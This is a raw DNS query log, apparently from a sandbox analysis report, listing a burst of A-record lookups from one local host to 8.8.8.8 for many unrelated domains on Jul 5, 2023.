                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.439213037 CEST192.168.2.68.8.8.80xd393Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.443224907 CEST192.168.2.68.8.8.80x3559Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.464823961 CEST192.168.2.68.8.8.80x615fStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.507210016 CEST192.168.2.68.8.8.80xdc18Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.507922888 CEST192.168.2.68.8.8.80x320aStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.510181904 CEST192.168.2.68.8.8.80xa924Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.514595985 CEST192.168.2.68.8.8.80x97Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.522526026 CEST192.168.2.68.8.8.80xaef7Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.565129042 CEST192.168.2.68.8.8.80x62d3Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.565359116 CEST192.168.2.68.8.8.80x7fa4Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.568208933 CEST192.168.2.68.8.8.80xd453Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.571559906 CEST192.168.2.68.8.8.80xa67bStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.574768066 CEST192.168.2.68.8.8.80x1b1bStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.588124990 CEST192.168.2.68.8.8.80x85ffStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.598705053 CEST192.168.2.68.8.8.80xd38aStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.605736017 CEST192.168.2.68.8.8.80xe500Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.612548113 CEST192.168.2.68.8.8.80x9251Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.617302895 CEST192.168.2.68.8.8.80xf368Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.634095907 CEST192.168.2.68.8.8.80x453aStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.637892962 CEST192.168.2.68.8.8.80x7012Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.674616098 CEST192.168.2.68.8.8.80x6d3aStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.684596062 CEST192.168.2.68.8.8.80xf82aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.684596062 CEST192.168.2.68.8.8.80x3fb1Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.697706938 CEST192.168.2.68.8.8.80x7220Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.699405909 CEST192.168.2.68.8.8.80x924cStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.705024004 CEST192.168.2.68.8.8.80xf146Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.709291935 CEST192.168.2.68.8.8.80x510dStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.709291935 CEST192.168.2.68.8.8.80xb7e3Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.733994007 CEST192.168.2.68.8.8.80xf910Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.739367962 CEST192.168.2.68.8.8.80x8464Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.763865948 CEST192.168.2.68.8.8.80xbfbfStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.767245054 CEST192.168.2.68.8.8.80xe5d5Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.767425060 CEST192.168.2.68.8.8.80xb403Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.769978046 CEST192.168.2.68.8.8.80xe381Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.774360895 CEST192.168.2.68.8.8.80xa362Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.781133890 CEST192.168.2.68.8.8.80x4536Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.783108950 CEST192.168.2.68.8.8.80x57c4Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.810139894 CEST192.168.2.68.8.8.80x2415Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.812983036 CEST192.168.2.68.8.8.80x1b51Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.823642015 CEST192.168.2.68.8.8.80xf820Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.827487946 CEST192.168.2.68.8.8.80x8f75Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.831784010 CEST192.168.2.68.8.8.80xbbe4Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.834477901 CEST192.168.2.68.8.8.80x89aaStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.844495058 CEST192.168.2.68.8.8.80xd213Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.846940041 CEST192.168.2.68.8.8.80x1c67Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.848624945 CEST192.168.2.68.8.8.80xa037Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.852300882 CEST192.168.2.68.8.8.80x4f99Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.869019985 CEST192.168.2.68.8.8.80xc8e3Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.871149063 CEST192.168.2.68.8.8.80x623aStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.874789000 CEST192.168.2.68.8.8.80x604fStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.892885923 CEST192.168.2.68.8.8.80xc88eStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.906234026 CEST192.168.2.68.8.8.80x3d0dStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.908884048 CEST192.168.2.68.8.8.80x6fbbStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.916671038 CEST192.168.2.68.8.8.80x6087Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.981965065 CEST192.168.2.68.8.8.80x7c17Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.031147957 CEST192.168.2.68.8.8.80x7c6Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.052685976 CEST192.168.2.68.8.8.80x7072Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.055769920 CEST192.168.2.68.8.8.80x6ca5Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.080431938 CEST192.168.2.68.8.8.80x98bcStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.083767891 CEST192.168.2.68.8.8.80x2273Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.086499929 CEST192.168.2.68.8.8.80x2334Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.090490103 CEST192.168.2.68.8.8.80x9949Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.117815018 CEST192.168.2.68.8.8.80x374dStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.121440887 CEST192.168.2.68.8.8.80xb9ffStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.137119055 CEST192.168.2.68.8.8.80x86f5Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.139591932 CEST192.168.2.68.8.8.80x71acStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.148706913 CEST192.168.2.68.8.8.80x5bacStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.155142069 CEST192.168.2.68.8.8.80x11acStandard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.156089067 CEST192.168.2.68.8.8.80xc674Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.156584024 CEST192.168.2.68.8.8.80xab7dStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.168982029 CEST192.168.2.68.8.8.80x9f0eStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.185097933 CEST192.168.2.68.8.8.80xce51Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.202419043 CEST192.168.2.68.8.8.80x25c1Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.219178915 CEST192.168.2.68.8.8.80x7734Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.228166103 CEST192.168.2.68.8.8.80x4253Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.232992887 CEST192.168.2.68.8.8.80x9d98Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.245862961 CEST192.168.2.68.8.8.80x4522Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.254266024 CEST192.168.2.68.8.8.80x3f38Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.266473055 CEST192.168.2.68.8.8.80xfeStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.289446115 CEST192.168.2.68.8.8.80x8ea5Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.295525074 CEST192.168.2.68.8.8.80x4d3aStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.308716059 CEST192.168.2.68.8.8.80x4939Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.341655970 CEST192.168.2.68.8.8.80x137fStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.345546007 CEST192.168.2.68.8.8.80x5cfeStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.347146034 CEST192.168.2.68.8.8.80xbbfaStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.359447956 CEST192.168.2.68.8.8.80x7bdeStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.362190008 CEST192.168.2.68.8.8.80xc93dStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.369389057 CEST192.168.2.68.8.8.80x8f9cStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.384721994 CEST192.168.2.68.8.8.80xa8b5Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.389540911 CEST192.168.2.68.8.8.80x9003Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.393913031 CEST192.168.2.68.8.8.80xce4dStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.393959999 CEST192.168.2.68.8.8.80x573Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.405944109 CEST192.168.2.68.8.8.80xf2f7Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.423566103 CEST192.168.2.68.8.8.80x5d77Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.428936005 CEST192.168.2.68.8.8.80x9339Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.442142963 CEST192.168.2.68.8.8.80x8f29Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.445525885 CEST192.168.2.68.8.8.80xc83dStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.452987909 CEST192.168.2.68.8.8.80x4308Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.460685968 CEST192.168.2.68.8.8.80x8491Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.471905947 CEST192.168.2.68.8.8.80x4064Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.479069948 CEST192.168.2.68.8.8.80x8dd6Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.546185017 CEST192.168.2.68.8.8.80xe616Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.563355923 CEST192.168.2.68.8.8.80x703Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.589854956 CEST192.168.2.68.8.8.80xa114Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.605791092 CEST192.168.2.68.8.8.80x7177Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.608793020 CEST192.168.2.68.8.8.80xde82Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.609755039 CEST192.168.2.68.8.8.80xd814Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.611993074 CEST192.168.2.68.8.8.80xac02Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.616872072 CEST192.168.2.68.8.8.80x5ff9Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.644874096 CEST192.168.2.68.8.8.80xcca6Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.651597023 CEST192.168.2.68.8.8.80x9880Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.653378963 CEST192.168.2.68.8.8.80xe500Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.664417982 CEST192.168.2.68.8.8.80xa016Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.668534994 CEST192.168.2.68.8.8.80xba54Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.669275999 CEST192.168.2.68.8.8.80x196eStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.677894115 CEST192.168.2.68.8.8.80xf84fStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.682295084 CEST192.168.2.68.8.8.80xd096Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.688515902 CEST192.168.2.68.8.8.80xe916Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.694901943 CEST192.168.2.68.8.8.80x8cd0Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.700547934 CEST192.168.2.68.8.8.80xe8f0Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.705581903 CEST192.168.2.68.8.8.80xaf0aStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.713416100 CEST192.168.2.68.8.8.80x552aStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.715601921 CEST192.168.2.68.8.8.80x3164Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.722054958 CEST192.168.2.68.8.8.80x73e0Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.743819952 CEST192.168.2.68.8.8.80xb14dStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.745765924 CEST192.168.2.68.8.8.80xb7e3Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.749882936 CEST192.168.2.68.8.8.80xe6abStandard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.750108957 CEST192.168.2.68.8.8.80x32a4Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.792135954 CEST192.168.2.68.8.8.80x4536Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.809084892 CEST192.168.2.68.8.8.80xf017Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.817614079 CEST192.168.2.68.8.8.80x2109Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.826967955 CEST192.168.2.68.8.8.80x76bbStandard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.850112915 CEST192.168.2.68.8.8.80xed20Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.850584984 CEST192.168.2.68.8.8.80x1b51Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.862256050 CEST192.168.2.68.8.8.80xbbe4Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.895828962 CEST192.168.2.68.8.8.80x29a3Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.898943901 CEST192.168.2.68.8.8.80xd004Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.908391953 CEST192.168.2.68.8.8.80x365cStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.913006067 CEST192.168.2.68.8.8.80x9098Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.917459965 CEST192.168.2.68.8.8.80x6ff6Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.922878027 CEST192.168.2.68.8.8.80xf14dStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.924318075 CEST192.168.2.68.8.8.80x9860Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.939112902 CEST192.168.2.68.8.8.80xf90eStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.961283922 CEST192.168.2.68.8.8.80x123fStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.962074995 CEST192.168.2.68.8.8.80xfe42Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.962707996 CEST192.168.2.68.8.8.80x83f4Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.963613987 CEST192.168.2.68.8.8.80x7d81Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.965046883 CEST192.168.2.68.8.8.80xb971Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.980278015 CEST192.168.2.68.8.8.80x34a5Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.989043951 CEST192.168.2.68.8.8.80xd5a9Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.996880054 CEST192.168.2.68.8.8.80x9c0dStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:48.999130964 CEST192.168.2.68.8.8.80xef0eStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.027920008 CEST192.168.2.68.8.8.80xfeaaStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.030873060 CEST192.168.2.68.8.8.80xe226Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.038630009 CEST192.168.2.68.8.8.80x96b9Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.045289993 CEST192.168.2.68.8.8.80x59e6Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.056945086 CEST192.168.2.68.8.8.80x6ca5Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.060230970 CEST192.168.2.68.8.8.80xe389Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.062042952 CEST192.168.2.68.8.8.80x4deaStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.074196100 CEST192.168.2.68.8.8.80x589bStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.074196100 CEST192.168.2.68.8.8.80xbbbbStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.131625891 CEST192.168.2.68.8.8.80x374dStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.152857065 CEST192.168.2.68.8.8.80xbc1Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.160231113 CEST192.168.2.68.8.8.80xe8bdStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.168534040 CEST192.168.2.68.8.8.80xd90fStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.177190065 CEST192.168.2.68.8.8.80x8be8Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.222054005 CEST192.168.2.68.8.8.80xea41Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.226974964 CEST192.168.2.68.8.8.80x903bStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.227718115 CEST192.168.2.68.8.8.80xf314Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.236063004 CEST192.168.2.68.8.8.80x49b9Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.245155096 CEST192.168.2.68.8.8.80x4a2aStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.252201080 CEST192.168.2.68.8.8.80xb1c9Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.254426003 CEST192.168.2.68.8.8.80xece4Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.257673979 CEST192.168.2.68.8.8.80x45a2Standard query (0)karila.frA (IP address)IN (0x0001)false
